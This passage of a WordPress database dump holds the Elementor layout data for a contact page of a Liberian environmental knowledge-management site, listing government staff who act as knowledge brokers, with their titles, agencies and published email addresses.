\\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24660,3648,'_elementor_edit_mode','builder'),(24661,3648,'_elementor_template_type','wp-page'),(24662,3648,'_elementor_version','3.0.16'),(24663,3648,'_wp_page_template','default'),(24664,3648,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\